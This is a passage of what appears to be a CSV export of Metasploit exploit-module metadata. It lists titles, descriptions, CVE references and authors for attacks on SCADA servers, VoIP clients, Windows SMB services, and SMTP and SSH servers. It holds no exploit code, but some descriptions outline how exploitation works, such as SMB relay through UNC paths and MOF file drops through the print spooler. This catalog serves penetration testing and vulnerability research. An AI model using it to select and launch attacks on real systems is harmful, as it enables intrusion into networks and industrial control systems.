On_FC_CONNECT_FCS_a_FILE Buffer Overflow",500,"This module exploits a vulnerability found in DATAC Control International RealWin SCADA Server 2.1 and below. By supplying a specially crafted On_FC_BINFILE_FCS_*FILE packet via port 910, RealWin will try to create a file (which would be saved to C:\Program Files\DATAC\Real Win\RW-version\filename) by first copying the user-supplied filename with an inline memcpy routine without proper bounds checking, which results in a stack-based buffer overflow, allowing arbitrary remote code execution. 
Tested version: 2.0 (Build 6.1.8.10)","Metasploit Framework License (BSD)","t","2011-03-21 00:00:00",0,,"aggressive","t","BID-46937, CVE-2011-1563, OSVDB-72826, URL-http://aluigi.altervista.org/adv/realwin_5-adv.txt, URL-http://www.us-cert.gov/control_systems/pdf/ICSA-11-110-01.pdf","Luigi Auriemma, MC " 1050,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/scada/realwin_on_fcs_login.rb","exploit","windows/scada/realwin_on_fcs_login","exploit/windows/scada/realwin_on_fcs_login","RealWin SCADA Server DATAC Login Buffer Overflow",500,"This module exploits a stack buffer overflow in DATAC Control International RealWin SCADA Server 2.1 (Build 6.0.10.10) or earlier. By sending a specially crafted On_FC_CONNECT_FCS_LOGIN packet containing a long username, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","t","2011-03-21 00:00:00",0,,"aggressive","t","CVE-2011-1563, OSVDB-72824, URL-http://aluigi.altervista.org/adv/realwin_2-adv.txt, URL-http://www.dataconline.com/software/realwin.php, URL-http://www.us-cert.gov/control_systems/pdf/ICSA-11-110-01.pdf","B|H , Luigi Auriemma, MC " 1051,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/scada/realwin_scpc_initialize.rb","exploit","windows/scada/realwin_scpc_initialize","exploit/windows/scada/realwin_scpc_initialize","DATAC RealWin SCADA Server SCPC_INITIALIZE Buffer Overflow",500,"This module exploits a stack buffer overflow in DATAC Control International RealWin SCADA Server 2.0 (Build 6.1.8.10). 
By sending a specially crafted packet, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","t","2010-10-15 00:00:00",0,,"aggressive","t","CVE-2010-4142, OSVDB-68812, URL-http://aluigi.altervista.org/adv/realwin_1-adv.txt, URL-http://www.us-cert.gov/control_systems/pdf/ICSA-10-313-01.pdf","Luigi Auriemma, MC " 1052,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/scada/realwin_scpc_initialize_rf.rb","exploit","windows/scada/realwin_scpc_initialize_rf","exploit/windows/scada/realwin_scpc_initialize_rf","DATAC RealWin SCADA Server SCPC_INITIALIZE_RF Buffer Overflow",500,"This module exploits a stack buffer overflow in DATAC Control International RealWin SCADA Server 2.0 (Build 6.1.8.10). By sending a specially crafted packet, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","t","2010-10-15 00:00:00",0,,"aggressive","t","CVE-2010-4142, OSVDB-68812, URL-http://aluigi.altervista.org/adv/realwin_1-adv.txt, URL-http://www.us-cert.gov/control_systems/pdf/ICSA-10-313-01.pdf","Luigi Auriemma, MC " 1053,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/scada/realwin_scpc_txtevent.rb","exploit","windows/scada/realwin_scpc_txtevent","exploit/windows/scada/realwin_scpc_txtevent","DATAC RealWin SCADA Server SCPC_TXTEVENT Buffer Overflow",500,"This module exploits a stack buffer overflow in DATAC Control International RealWin SCADA Server 2.0 (Build 6.1.8.10). 
By sending a specially crafted packet, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","t","2010-11-18 00:00:00",0,,"aggressive","t","CVE-2010-4142, OSVDB-68812","Luigi Auriemma, MC " 1054,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/scada/scadapro_cmdexe.rb","exploit","windows/scada/scadapro_cmdexe","exploit/windows/scada/scadapro_cmdexe","Measuresoft ScadaPro <= 4.0.0 Remote Command Execution",600,"This module allows remote attackers to execute arbitrary commands on the affected system by abusing a directory traversal flaw in the 'xf' command (execute function). An attacker can call system() from msvcrt.dll to upload a backdoor and gain remote code execution.","Metasploit Framework License (BSD)","f","2011-09-16 00:00:00",0,,"passive","t","BID-49613, CVE-2011-3497, OSVDB-75490, URL-http://aluigi.altervista.org/adv/scadapro_1-adv.txt, URL-http://us-cert.gov/control_systems/pdf/ICS-ALERT-11-256-04.pdf, URL-http://www.measuresoft.net/news/post/Inaccurate-Reports-of-Measuresoft-ScadaPro-400-Vulnerability.aspx","Luigi Auriemma, TecR0c , mr_me " 1055,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/scada/sunway_force_control_netdbsrv.rb","exploit","windows/scada/sunway_force_control_netdbsrv","exploit/windows/scada/sunway_force_control_netdbsrv","Sunway Forcecontrol SNMP NetDBServer.exe Opcode 0x57",500,"This module exploits a stack based buffer overflow found in the SNMP NetDBServer service of Sunway Forcecontrol <= 6.1 sp3. 
The overflow is triggered when sending an overly long string to the listening service on port 2001.","Metasploit Framework License (BSD)","t","2011-09-22 00:00:00",0,,"aggressive","t","BID-49747, OSVDB-75798, URL-http://aluigi.altervista.org/adv/forcecontrol_1-adv.txt","James Fitts , Luigi Auriemma, Rinat Ziyayev" 1056,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/scada/winlog_runtime.rb","exploit","windows/scada/winlog_runtime","exploit/windows/scada/winlog_runtime","Sielco Sistemi Winlog Buffer Overflow",500,"This module exploits a buffer overflow in Sielco Sistemi Winlog <= 2.07.00. When sending a specially formatted packet to the Runtime.exe service, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2011-01-13 00:00:00",0,,"aggressive","t","CVE-2011-0517, OSVDB-70418, URL-http://aluigi.org/adv/winlog_1-adv.txt, URL-http://www.us-cert.gov/control_systems/pdf/ICSA-11-017-02.pdf","Luigi Auriemma, MC " 1057,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/scada/winlog_runtime_2.rb","exploit","windows/scada/winlog_runtime_2","exploit/windows/scada/winlog_runtime_2","Sielco Sistemi Winlog Buffer Overflow 2.07.14 - 2.07.16",300,"This module exploits a buffer overflow in Sielco Sistemi Winlog <= 2.07.16. 
When sending a specially formatted packet to the Runtime.exe service on port 46824, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2012-06-04 00:00:00",0,,"aggressive","t","BID-53811, CVE-2012-3815, EDB-18986, OSVDB-82654, URL-http://www.s3cur1ty.de/m1adv2012-001, URL-http://www.sielcosistemi.com/en/download/public/winlog_lite.html","Michael Messner " 1058,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/sip/aim_triton_cseq.rb","exploit","windows/sip/aim_triton_cseq","exploit/windows/sip/aim_triton_cseq","AIM Triton 1.0.4 CSeq Buffer Overflow",500,"This module exploits a buffer overflow in AOL's AIM Triton 1.0.4. By sending an overly long CSeq value, a remote attacker could overflow a buffer and execute arbitrary code on the system with the privileges of the affected application.","Metasploit Framework License (BSD)","f","2006-07-10 00:00:00",0,,"aggressive","t","BID-18906, CVE-2006-3524, OSVDB-27122","MC " 1059,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/sip/sipxezphone_cseq.rb","exploit","windows/sip/sipxezphone_cseq","exploit/windows/sip/sipxezphone_cseq","SIPfoundry sipXezPhone 0.35a CSeq Field Overflow",500,"This module exploits a buffer overflow in SIPfoundry's sipXezPhone version 0.35a. By sending a long CSeq header, a remote attacker could overflow a buffer and execute arbitrary code on the system with the privileges of the affected application.","Metasploit Framework License (BSD)","f","2006-07-10 00:00:00",0,,"aggressive","t","BID-18906, CVE-2006-3524, OSVDB-27122","MC " 1060,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/sip/sipxphone_cseq.rb","exploit","windows/sip/sipxphone_cseq","exploit/windows/sip/sipxphone_cseq","SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow",500,"This module exploits a buffer overflow in SIPfoundry's sipXphone 2.6.0.27. 
By sending an overly long CSeq value, a remote attacker could overflow a buffer and execute arbitrary code on the system with the privileges of the affected application.","Metasploit Framework License (BSD)","f","2006-07-10 00:00:00",0,,"aggressive","t","BID-18906, CVE-2006-3524, OSVDB-27122","MC " 1061,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/smb/ms03_049_netapi.rb","exploit","windows/smb/ms03_049_netapi","exploit/windows/smb/ms03_049_netapi","Microsoft Workstation Service NetAddAlternateComputerName Overflow",400,"This module exploits a stack buffer overflow in the NetApi32 NetAddAlternateComputerName function using the Workstation service in Windows XP.","Metasploit Framework License (BSD)","t","2003-11-11 00:00:00",0,,"aggressive","t","BID-9011, CVE-2003-0812, MSB-MS03-049, OSVDB-11461","hdm " 1062,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/smb/ms04_007_killbill.rb","exploit","windows/smb/ms04_007_killbill","exploit/windows/smb/ms04_007_killbill","Microsoft ASN.1 Library Bitstring Heap Overflow",100,"This is an exploit for a previously undisclosed vulnerability in the bit string decoding code in the Microsoft ASN.1 library. This vulnerability is not related to the bit string vulnerability described in eEye advisory AD20040210-2. Both vulnerabilities were fixed in the MS04-007 patch. You are only allowed one attempt with this vulnerability. If the payload fails to execute, the LSASS system service will crash and the target system will automatically reboot itself in 60 seconds. If the payload succeeds, the system will no longer be able to process authentication requests, denying all attempts to login through SMB or at the console. A reboot is required to restore proper functioning of an exploited system. This exploit has been successfully tested with the win32/*/reverse_tcp payloads, however a few problems were encountered when using the equivalent bind payloads. 
Your mileage may vary.","BSD License","t","2004-02-10 00:00:00",0,,"aggressive","t","BID-9633, CVE-2003-0818, MSB-MS04-007, OSVDB-3902, URL-http://www.phreedom.org/solar/exploits/msasn1-bitstring/","Solar Eclipse " 1063,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/smb/ms04_011_lsass.rb","exploit","windows/smb/ms04_011_lsass","exploit/windows/smb/ms04_011_lsass","Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow",400,"This module exploits a stack buffer overflow in the LSASS service; this vulnerability was originally found by eEye. When re-exploiting a Windows XP system, you will need to run this module twice. DCERPC request fragmentation can be performed by setting the 'FragSize' parameter.","Metasploit Framework License (BSD)","t","2004-04-13 00:00:00",0,,"aggressive","t","BID-10108, CVE-2003-0533, MSB-MS04-011, OSVDB-5248","hdm " 1064,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/smb/ms04_031_netdde.rb","exploit","windows/smb/ms04_031_netdde","exploit/windows/smb/ms04_031_netdde","Microsoft NetDDE Service Overflow",400,"This module exploits a stack buffer overflow in the NetDDE service, which is the precursor to the DCOM interface. This exploit affects only operating systems released prior to Windows XP SP1 (2000 SP4, XP SP0). Despite Microsoft's claim that this vulnerability can be exploited without authentication, the NDDEAPI pipe is only accessible after successful authentication.","BSD License","t","2004-10-12 00:00:00",0,,"aggressive","t","BID-11372, CVE-2004-0206, MSB-MS04-031, OSVDB-10689","pusscat " 1065,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/smb/ms05_039_pnp.rb","exploit","windows/smb/ms05_039_pnp","exploit/windows/smb/ms05_039_pnp","Microsoft Plug and Play Service Overflow",400,"This module exploits a stack buffer overflow in the Windows Plug and Play service. 
This vulnerability can be exploited on Windows 2000 without a valid user account. NOTE: Since the PnP service runs inside the services.exe process, a failed exploit attempt will cause the system to automatically reboot.","Metasploit Framework License (BSD)","t","2005-08-09 00:00:00",0,,"aggressive","t","BID-14513, CVE-2005-1983, MSB-MS05-039, OSVDB-18605","cazz , hdm " 1066,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb","exploit","windows/smb/ms06_025_rasmans_reg","exploit/windows/smb/ms06_025_rasmans_reg","Microsoft RRAS Service RASMAN Registry Overflow",400,"This module exploits a registry-based stack buffer overflow in the Windows Routing and Remote Access Service. Since the service is hosted inside svchost.exe, a failed exploit attempt can cause other system services to fail as well. A valid username and password are required to exploit this flaw on Windows 2000. When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'. Exploiting this flaw involves two distinct steps - creating the registry key and then triggering an overwrite based on a read of this key. Once the key is created, it cannot be recreated. This means that for any given system, you only get one chance to exploit this flaw. Picking the wrong target will require a manual removal of the following registry key before you can try again: HKEY_USERS\.DEFAULT\Software\Microsoft\RAS Phonebook","BSD License","t","2006-06-13 00:00:00",0,,"aggressive","t","BID-18325, CVE-2006-2370, MSB-MS06-025, OSVDB-26437","hdm , pusscat " 1067,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/smb/ms06_025_rras.rb","exploit","windows/smb/ms06_025_rras","exploit/windows/smb/ms06_025_rras","Microsoft RRAS Service Overflow",200,"This module exploits a stack buffer overflow in the Windows Routing and Remote Access Service. 
Since the service is hosted inside svchost.exe, a failed exploit attempt can cause other system services to fail as well. A valid username and password are required to exploit this flaw on Windows 2000. When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.","Metasploit Framework License (BSD)","t","2006-06-13 00:00:00",,,"aggressive","t","BID-18325, CVE-2006-2370, MSB-MS06-025, OSVDB-26437","Nicolas Pouvesle , hdm " 1068,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/smb/ms06_040_netapi.rb","exploit","windows/smb/ms06_040_netapi","exploit/windows/smb/ms06_040_netapi","Microsoft Server Service NetpwPathCanonicalize Overflow",400,"This module exploits a stack buffer overflow in the NetApi32 CanonicalizePathName() function using the NetpwPathCanonicalize RPC call in the Server Service. It is likely that other RPC calls could be used to exploit this service. This exploit will result in a denial of service on Windows XP SP2 or Windows 2003 SP1. A failed exploit attempt will likely result in a complete reboot on Windows 2000 and the termination of all SMB-related services on Windows XP. The default target for this exploit should succeed on Windows NT 4.0, Windows 2000 SP0-SP4+, Windows XP SP0-SP1 and Windows 2003 SP0.","Metasploit Framework License (BSD)","t","2006-08-08 00:00:00",0,,"aggressive","t","BID-19409, CVE-2006-3439, MSB-MS06-040, OSVDB-27845","hdm " 1069,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/smb/ms06_066_nwapi.rb","exploit","windows/smb/ms06_066_nwapi","exploit/windows/smb/ms06_066_nwapi","Microsoft Services MS06-066 nwapi32.dll Module Exploit",400,"This module exploits a stack buffer overflow in the svchost service when the netware client service is running. 
This specific vulnerability is in the nwapi32.dll module.","Metasploit Framework License (BSD)","t","2006-11-14 00:00:00",0,,"aggressive","t","BID-21023, CVE-2006-4688, MSB-MS06-066, OSVDB-30260","pusscat " 1070,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/smb/ms06_066_nwwks.rb","exploit","windows/smb/ms06_066_nwwks","exploit/windows/smb/ms06_066_nwwks","Microsoft Services MS06-066 nwwks.dll Module Exploit",400,"This module exploits a stack buffer overflow in the svchost service when the netware client service is running. This specific vulnerability is in the nwapi32.dll module.","Metasploit Framework License (BSD)","t","2006-11-14 00:00:00",0,,"aggressive","t","BID-21023, CVE-2006-4688, MSB-MS06-066, OSVDB-30260","pusscat " 1071,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/smb/ms06_070_wkssvc.rb","exploit","windows/smb/ms06_070_wkssvc","exploit/windows/smb/ms06_070_wkssvc","Microsoft Workstation Service NetpManageIPCConnect Overflow",0,"This module exploits a stack buffer overflow in the NetApi32 NetpManageIPCConnect function using the Workstation service in Windows 2000 SP4 and Windows XP SP2. In order to exploit this vulnerability, you must specify the name of a valid Windows DOMAIN. It may be possible to satisfy this condition by using a custom DNS and LDAP setup; however, that method is not covered here. Although Windows XP SP2 is vulnerable, Microsoft reports that Administrator credentials are required to reach the vulnerable code. Windows XP SP1 only requires valid user credentials. 
Also, testing shows that a machine already joined to a domain is not exploitable.","Metasploit Framework License (BSD)","t","2006-11-14 00:00:00",0,,"aggressive","t","BID-20985, CVE-2006-4691, MSB-MS06-070, OSVDB-30263","jduck " 1072,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/smb/ms07_029_msdns_zonename.rb","exploit","windows/smb/ms07_029_msdns_zonename","exploit/windows/smb/ms07_029_msdns_zonename","Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB)",0,"This module exploits a stack buffer overflow in the RPC interface of the Microsoft DNS service. The vulnerability is triggered when a long zone name parameter is supplied that contains escaped octal strings. This module is capable of bypassing NX/DEP protection on Windows 2003 SP1/SP2. This module exploits the RPC service using the \DNSSERVER pipe available via SMB. This pipe requires a valid user account to access, so the SMBUSER and SMBPASS options must be specified.","Metasploit Framework License (BSD)","t","2007-04-12 00:00:00",0,,"aggressive","t","CVE-2007-1748, MSB-MS07-029, OSVDB-34100, URL-http://www.microsoft.com/technet/security/advisory/935964.mspx","Unknown, hdm " 1073,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/smb/ms08_067_netapi.rb","exploit","windows/smb/ms08_067_netapi","exploit/windows/smb/ms08_067_netapi","Microsoft Server Service Relative Path Stack Corruption",500,"This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to handle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts. 
This is just the first version of this module; full support for NX bypass on 2003, along with other platforms, is still in development.","Metasploit Framework License (BSD)","t","2008-10-28 00:00:00",0,,"aggressive","t","CVE-2008-4250, MSB-MS08-067, OSVDB-49243, URL-http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos","Brett Moore , hdm , jduck , staylor" 1074,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb","exploit","windows/smb/ms09_050_smb2_negotiate_func_index","exploit/windows/smb/ms09_050_smb2_negotiate_func_index","Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference",400,"This module exploits an out-of-bounds function table dereference in the SMB request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7 release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista without SP1 does not seem affected by this flaw.","Metasploit Framework License (BSD)","t","2009-09-07 00:00:00",0,,"aggressive","t","BID-36299, CVE-2009-3103, MSB-MS09-050, OSVDB-57799, URL-http://seclists.org/fulldisclosure/2009/Sep/0039.html, URL-http://www.microsoft.com/technet/security/Bulletin/MS09-050.mspx","Laurent Gaffie , hdm , sf " 1075,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/smb/ms10_061_spoolss.rb","exploit","windows/smb/ms10_061_spoolss","exploit/windows/smb/ms10_061_spoolss","Microsoft Print Spooler Service Impersonation Vulnerability",600,"This module exploits the RPC service impersonation vulnerability detailed in Microsoft Bulletin MS10-061. By making a specific DCE RPC request to the StartDocPrinter procedure, an attacker can impersonate the Printer Spooler service to create a file. The working directory at the time is %SystemRoot%\system32. An attacker can specify any file name, including directory traversal or full paths. 
By sending WritePrinter requests, an attacker can fully control the content of the created file. In order to gain code execution, this module writes to a directory used by Windows Management Instrumentation (WMI) to deploy applications. This directory (Wbem\Mof) is periodically scanned and any new .mof files are processed automatically. This is the same technique employed by the Stuxnet code found in the wild.","Metasploit Framework License (BSD)","t","2010-09-14 00:00:00",0,,"aggressive","t","CVE-2010-2729, MSB-MS10-061, OSVDB-67988","hdm , jduck " 1076,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb","exploit","windows/smb/netidentity_xtierrpcpipe","exploit/windows/smb/netidentity_xtierrpcpipe","Novell NetIdentity Agent XTIERRPCPIPE Named Pipe Buffer Overflow",500,"This module exploits a stack buffer overflow in Novell's NetIdentity Agent. When sending a specially crafted string to the 'XTIERRPCPIPE' named pipe, an attacker may be able to execute arbitrary code. The success of this module is much greater once the service has been restarted.","Metasploit Framework License (BSD)","t","2009-04-06 00:00:00",0,,"aggressive","t","BID-34400, CVE-2009-1350, OSVDB-53351, URL-http://www.reversemode.com/index.php?option=com_content&task=view&id=62&Itemid=1","MC , Ruben Santamarta" 1077,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/smb/psexec.rb","exploit","windows/smb/psexec","exploit/windows/smb/psexec","Microsoft Windows Authenticated User Code Execution",0,"This module uses a valid administrator username and password (or password hash) to execute an arbitrary payload. This module is similar to the ""psexec"" utility provided by SysInternals. This module is now able to clean up after itself. 
The service created by this tool uses a randomly chosen name and description.","Metasploit Framework License (BSD)","t","1999-01-01 00:00:00",0,,"aggressive","t","CVE-1999-0504, OSVDB-3106, URL-http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx","hdm " 1078,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/smb/smb_relay.rb","exploit","windows/smb/smb_relay","exploit/windows/smb/smb_relay","Microsoft Windows SMB Relay Code Execution",600,"This module will relay SMB authentication requests to another host, gaining access to an authenticated SMB session if successful. If the connecting user is an administrator and network logins are allowed to the target machine, this module will execute an arbitrary payload. To exploit this, the target system must try to authenticate to this module. The easiest way to force an SMB authentication attempt is by embedding a UNC path (\\SERVER\SHARE) into a web page or email message. When the victim views the web page or email, their system will automatically connect to the server specified in the UNC share (the IP address of the system running this module) and attempt to authenticate. Unfortunately, this module is not able to clean up after itself. The service and payload file listed in the output will need to be manually removed after access has been gained. The service created by this tool uses a randomly chosen name and description, so the services list can become cluttered after repeated exploitation. The SMB authentication relay attack was first reported by Sir Dystic on March 31st, 2001 at @lanta.con in Atlanta, Georgia. On November 11th 2008 Microsoft released bulletin MS08-068. This bulletin includes a patch which prevents the relaying of challenge keys back to the host which issued them, preventing this exploit from working in the default configuration. 
It is still possible to set the SMBHOST parameter to a third-party host that the victim is authorized to access, but the ""reflection"" attack has been effectively broken.","Metasploit Framework License (BSD)","t","2001-03-31 00:00:00",0,,"passive","t","CVE-2008-4037, MSB-MS08-068, OSVDB-49736, URL-http://blogs.technet.com/swi/archive/2008/11/11/smb-credential-reflection.aspx, URL-http://en.wikipedia.org/wiki/SMBRelay, URL-http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx, URL-http://www.xfocus.net/articles/200305/smbrelay.html","hdm " 1079,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/smb/timbuktu_plughntcommand_bof.rb","exploit","windows/smb/timbuktu_plughntcommand_bof","exploit/windows/smb/timbuktu_plughntcommand_bof","Timbuktu <= 8.6.6 PlughNTCommand Named Pipe Buffer Overflow",500,"This module exploits a stack based buffer overflow in Timbuktu Pro version <= 8.6.6 in a pretty novel way. This exploit requires two connections. The first connection is used to leak stack data using the buffer overflow to overwrite the nNumberOfBytesToWrite argument. By supplying a large value for this argument it is possible to cause Timbuktu to reply to the initial request with leaked stack data. Using this data allows for reliable exploitation of the buffer overflow vulnerability. Props to Infamous41d for helping in finding this exploitation path. The second connection utilizes the data from the data leak to accurately exploit the stack based buffer overflow vulnerability. 
TODO: hdm suggested using meterpreter's migration capability and restarting the process for multishot exploitation.","Metasploit Framework License (BSD)","t","2009-06-25 00:00:00",0,,"aggressive","t","BID-35496, CVE-2009-1394, OSVDB-55436, URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=809","bannedit " 1080,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb","exploit","windows/smtp/mailcarrier_smtp_ehlo","exploit/windows/smtp/mailcarrier_smtp_ehlo","TABS MailCarrier v2.51 SMTP EHLO Overflow",400,"This module exploits the MailCarrier v2.51 suite SMTP service. The stack is overwritten when sending an overly long EHLO command.","Metasploit Framework License (BSD)","t","2004-10-26 00:00:00",0,,"aggressive","t","BID-11535, CVE-2004-1638, EDB-598, OSVDB-11174","patrick " 1081,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/smtp/mercury_cram_md5.rb","exploit","windows/smtp/mercury_cram_md5","exploit/windows/smtp/mercury_cram_md5","Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow",500,"This module exploits a stack buffer overflow in Mercury Mail Transport System 4.51. By sending a specially crafted argument to the AUTH CRAM-MD5 command, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","t","2007-08-18 00:00:00",0,,"aggressive","t","BID-25357, CVE-2007-4440, OSVDB-39669","MC " 1082,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb","exploit","windows/smtp/ms03_046_exchange2000_xexch50","exploit/windows/smtp/ms03_046_exchange2000_xexch50","MS03-046 Exchange 2000 XEXCH50 Heap Overflow",400,"This is an exploit for the Exchange 2000 heap overflow. Due to the nature of the vulnerability, this exploit is not very reliable. This module has been tested against Exchange 2000 SP0 and SP3 running a Windows 2000 system patched to SP4. 
It normally takes between one and 100 connection attempts to successfully obtain a shell. This exploit is *very* unreliable.","Metasploit Framework License (BSD)","t","2003-10-15 00:00:00",0,,"aggressive","t","BID-8838, CVE-2003-0714, EDB-113, MSB-MS03-046, OSVDB-2674","hdm , patrick " 1083,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/smtp/njstar_smtp_bof.rb","exploit","windows/smtp/njstar_smtp_bof","exploit/windows/smtp/njstar_smtp_bof","NJStar Communicator 3.00 MiniSMTP Buffer Overflow",300,"This module exploits a stack buffer overflow vulnerability in NJStar Communicator Version 3.00 MiniSMTP server. The MiniSMTP application can be seen in multiple NJStar products, and will continue to run in the background even if the software is already shutdown. According to the vendor's testimonials, NJStar software is also used by well known companies such as Siemens, NEC, Google, Yahoo, eBay; government agencies such as the FBI, Department of Justice (HK); as well as a long list of universities such as Yale, Harvard, University of Tokyo, etc.","Metasploit Framework License (BSD)","f","2011-10-31 00:00:00",0,,"aggressive","t","CVE-2011-4040, EDB-18057, OSVDB-76728, URL-http://www.njstar.com/cms/njstar-communicator","Dillon Beresford" 1084,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/smtp/wmailserver.rb","exploit","windows/smtp/wmailserver","exploit/windows/smtp/wmailserver","SoftiaCom WMailserver 1.0 Buffer Overflow",200,"This module exploits a stack buffer overflow in SoftiaCom WMailserver 1.0 (SMTP) via a SEH frame overwrite.","Metasploit Framework License (BSD)","t","2005-07-11 00:00:00",0,,"aggressive","t","BID-14213, CVE-2005-2287, OSVDB-17883","MC " 1085,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/smtp/ypops_overflow1.rb","exploit","windows/smtp/ypops_overflow1","exploit/windows/smtp/ypops_overflow1","YPOPS 0.6 Buffer Overflow",200,"This module exploits a stack buffer 
overflow in the YPOPS POP3 service. This is a classic stack buffer overflow for YPOPS version 0.6. Possibly Affected version 0.5, 0.4.5.1, 0.4.5. Eip point to jmp ebx opcode in ws_32.dll","Metasploit Framework License (BSD)","f","2004-09-27 00:00:00",,,"aggressive","t","BID-11256, CVE-2004-1558, OSVDB-10367, URL-http://www.securiteam.com/windowsntfocus/5GP0M2KE0S.html","acaro " 1086,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ssh/freeftpd_key_exchange.rb","exploit","windows/ssh/freeftpd_key_exchange","exploit/windows/ssh/freeftpd_key_exchange","FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow",200,"This module exploits a simple stack buffer overflow in FreeFTPd 1.0.10 This flaw is due to a buffer overflow error when handling a specially crafted key exchange algorithm string received from an SSH client. This module is based on MC's freesshd_key_exchange exploit.","BSD License","t","2006-05-12 00:00:00",0,,"aggressive","t","BID-17958, CVE-2006-2407, OSVDB-25569","riaf " 1087,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ssh/freesshd_authbypass.rb","exploit","windows/ssh/freesshd_authbypass","exploit/windows/ssh/freesshd_authbypass","Freesshd Authentication Bypass",600,"This module exploits a vulnerability found in FreeSSHd <= 1.2.6 to bypass authentication. You just need the username (which defaults to root). 
The exploit has been tested with both password and public key authentication.","Metasploit Framework License (BSD)","t","2010-08-11 00:00:00",0,,"aggressive","t","BID-56785, CVE-2012-6066, OSVDB-88006, URL-http://archives.neohapsis.com/archives/fulldisclosure/2012-12/0012.html, URL-http://seclists.org/fulldisclosure/2010/Aug/132","Aris, Daniele Martini , kcope" 1088,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ssh/freesshd_key_exchange.rb","exploit","windows/ssh/freesshd_key_exchange","exploit/windows/ssh/freesshd_key_exchange","FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow",200,"This module exploits a simple stack buffer overflow in FreeSSHd 1.0.9. This flaw is due to a buffer overflow error when handling a specially crafted key exchange algorithm string received from an SSH client.","Metasploit Framework License (BSD)","t","2006-05-12 00:00:00",0,,"aggressive","t","BID-17958, CVE-2006-2407, OSVDB-25463","MC " 1089,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ssh/putty_msg_debug.rb","exploit","windows/ssh/putty_msg_debug","exploit/windows/ssh/putty_msg_debug","PuTTy.exe <= v0.53 Buffer Overflow",300,"This module exploits a buffer overflow in the PuTTY SSH client that 